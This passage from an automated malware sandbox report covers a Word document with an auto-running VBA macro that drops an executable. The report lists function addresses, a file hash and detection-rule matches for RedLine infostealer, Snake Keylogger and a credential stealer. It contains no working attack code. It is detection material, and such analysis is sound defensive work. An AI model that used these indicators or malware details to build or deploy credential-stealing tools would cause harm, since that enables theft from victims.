          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 14_2_0041824414_2_00418244
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 14_2_0040165014_2_00401650
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 14_2_00402F2014_2_00402F20
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 14_2_004193C414_2_004193C4
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 14_2_0041878814_2_00418788
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 14_2_00402F8914_2_00402F89
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 14_2_00402B9014_2_00402B90
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 14_2_004073A014_2_004073A0
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 14_2_33EF12C014_2_33EF12C0
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 14_2_33EF12B014_2_33EF12B0
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 14_2_33EF156014_2_33EF1560
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 14_2_33EF154F14_2_33EF154F
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 14_2_370DB7A114_2_370DB7A1
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 14_2_370DD49014_2_370DD490
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 14_2_370DB4BF14_2_370DB4BF
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 14_2_370DB1E114_2_370DB1E1
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 14_2_370D41E114_2_370D41E1
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 14_2_370DF0C914_2_370DF0C9
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 14_2_370DAF0014_2_370DAF00
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 14_2_370D8F1814_2_370D8F18
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 14_2_370D5E5814_2_370D5E58
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 14_2_370DBD5F14_2_370DBD5F
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 14_2_370DAA5814_2_370DAA58
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 14_2_370DBA8114_2_370DBA81
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 14_2_370DE5D814_2_370DE5D8
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 14_2_370DE5E814_2_370DE5E8
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 14_2_370DD48114_2_370DD481
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 14_2_370D306814_2_370D3068
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 14_2_370DAC2014_2_370DAC20
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 14_2_3819004014_2_38190040
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 14_2_3819350814_2_38193508
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 14_2_3819855014_2_38198550
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 14_2_38190E3814_2_38190E38
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 14_2_38197A2814_2_38197A28
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 14_2_3819073814_2_38190738
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 14_2_3819D83014_2_3819D830
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 14_2_3819D84014_2_3819D840
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 14_2_3819707114_2_38197071
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 14_2_3819DC9814_2_3819DC98
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 14_2_3819DC8814_2_3819DC88
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 14_2_3819708014_2_38197080
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 14_2_381934F814_2_381934F8
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 14_2_3819E0F014_2_3819E0F0
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 14_2_3819E0E114_2_3819E0E1
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 14_2_3819E53914_2_3819E539
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 14_2_3819E54814_2_3819E548
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 14_2_3819854014_2_38198540
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 14_2_3819B57414_2_3819B574
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 14_2_3819E99114_2_3819E991
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 14_2_3819B58014_2_3819B580
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 14_2_3819E9A014_2_3819E9A0
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 14_2_3819B9D814_2_3819B9D8
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 14_2_3819B9CA14_2_3819B9CA
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 14_2_3819EDF814_2_3819EDF8
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 14_2_3819EDE914_2_3819EDE9
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 14_2_3819BE3014_2_3819BE30
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 14_2_38190E2914_2_38190E29
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 14_2_3819BE2014_2_3819BE20
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 14_2_3819F25014_2_3819F250
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 14_2_3819F24014_2_3819F240
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 14_2_3819C27A14_2_3819C27A
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 14_2_3819F69A14_2_3819F69A
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 14_2_3819C28814_2_3819C288
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 14_2_3819F6A814_2_3819F6A8
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 14_2_3819C6D014_2_3819C6D0
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 14_2_3819FAF014_2_3819FAF0
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 14_2_3819C6E014_2_3819C6E0
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 14_2_3819FB0014_2_3819FB00
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 14_2_3819CB3814_2_3819CB38
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 14_2_3819072A14_2_3819072A
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 14_2_3819CB2A14_2_3819CB2A
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 14_2_3819CF9014_2_3819CF90
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 14_2_3819CF8014_2_3819CF80
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 14_2_3819D3DA14_2_3819D3DA
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 14_2_3819D3E814_2_3819D3E8
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 14_2_381A6C1814_2_381A6C18
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 14_2_381A58B814_2_381A58B8
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 14_2_381A7AF014_2_381A7AF0
          Source: PI ITS15235.doc, OLE, VBA macro line: Sub AutoOpen()
          Source: VBA code instrumentation, OLE, VBA macro: Module ThisDocument, Function AutoOpen, Name: AutoOpen
          Source: PI ITS15235.doc, OLE indicator, VBA macros: true
          Source: Joe Sandbox View, Dropped File: C:\Users\Public\Libraries\npratlsN.pif BDFA725EC2A2C8EA5861D9B4C2F608E631A183FCA7916C1E07A28B656CC8EC0C
          Source: 14.2.npratlsN.pif.400000.1.raw.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
          Source: 18.2.npratlsN.pif.400000.1.raw.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
          Source: 14.1.npratlsN.pif.400000.1.raw.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
          Source: 4.2.brightness.exe.217d67a8.10.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
          Source: 8.2.npratlsN.pif.400000.2.raw.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
          Source: 18.1.npratlsN.pif.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
          Source: 8.1.npratlsN.pif.400000.0.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
          Source: 8.2.npratlsN.pif.2866a8ee.4.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 8.2.npratlsN.pif.2866a8ee.4.unpack, type: UNPACKEDPE, Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 8.2.npratlsN.pif.2866a8ee.4.unpack, type: UNPACKEDPE, Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
          Source: 8.2.npratlsN.pif.2b690000.7.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 8.2.npratlsN.pif.2b690000.7.raw.unpack, type: UNPACKEDPE, Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 18.2.npratlsN.pif.206f9a06.2.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 18.2.npratlsN.pif.206f9a06.2.unpack, type: UNPACKEDPE, Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 18.2.npratlsN.pif.206f9a06.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
          Source: 14.2.npratlsN.pif.33faa8ee.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 14.1.npratlsN.pif.400000.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
          Source: 18.2.npratlsN.pif.23470000.6.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 18.2.npratlsN.pif.23470000.6.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 18.2.npratlsN.pif.23470000.6.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
          Source: 8.2.npratlsN.pif.2b690000.7.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
          Source: 4.2.brightness.exe.218133d8.9.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
          Source: 18.2.npratlsN.pif.22e20ee8.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 18.2.npratlsN.pif.22e20ee8.5.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 18.3.npratlsN.pif.1ea7e990.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 18.2.npratlsN.pif.22e20000.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 14.2.npratlsN.pif.33fa9a06.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 8.2.npratlsN.pif.288e0ee8.6.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 8.2.npratlsN.pif.288e0ee8.6.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 8.2.npratlsN.pif.288e0ee8.6.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
          Source: 14.2.npratlsN.pif.36830000.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 14.2.npratlsN.pif.33fa9a06.2.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 14.2.npratlsN.pif.33fa9a06.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
          Source: 14.2.npratlsN.pif.33faa8ee.3.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 11.2.Nsltarpn.PIF.210035b8.6.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
          Source: 18.2.npratlsN.pif.22e20000.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 18.2.npratlsN.pif.22e20000.4.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 18.2.npratlsN.pif.22e20000.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
          Source: 14.2.npratlsN.pif.36830000.5.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 14.2.npratlsN.pif.36f80000.6.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 14.2.npratlsN.pif.36f80000.6.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 14.2.npratlsN.pif.36f80000.6.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
          Source: 8.2.npratlsN.pif.400000.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
          Source: 14.2.npratlsN.pif.36f80000.6.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 18.2.npratlsN.pif.22e20ee8.5.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
          Source: 8.2.npratlsN.pif.288e0000.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 8.2.npratlsN.pif.288e0000.5.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 8.2.npratlsN.pif.288e0000.5.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
          Source: 14.2.npratlsN.pif.36830000.5.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
          Source: 18.2.npratlsN.pif.23470000.6.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 18.3.npratlsN.pif.1ea7e990.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 8.2.npratlsN.pif.28669a06.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 8.3.npratlsN.pif.26ade320.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 8.2.npratlsN.pif.28669a06.3.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
